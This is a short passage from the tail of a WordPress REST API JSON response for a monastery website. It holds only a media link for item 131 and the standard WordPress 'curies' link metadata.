ttps:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/media?parent=131"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}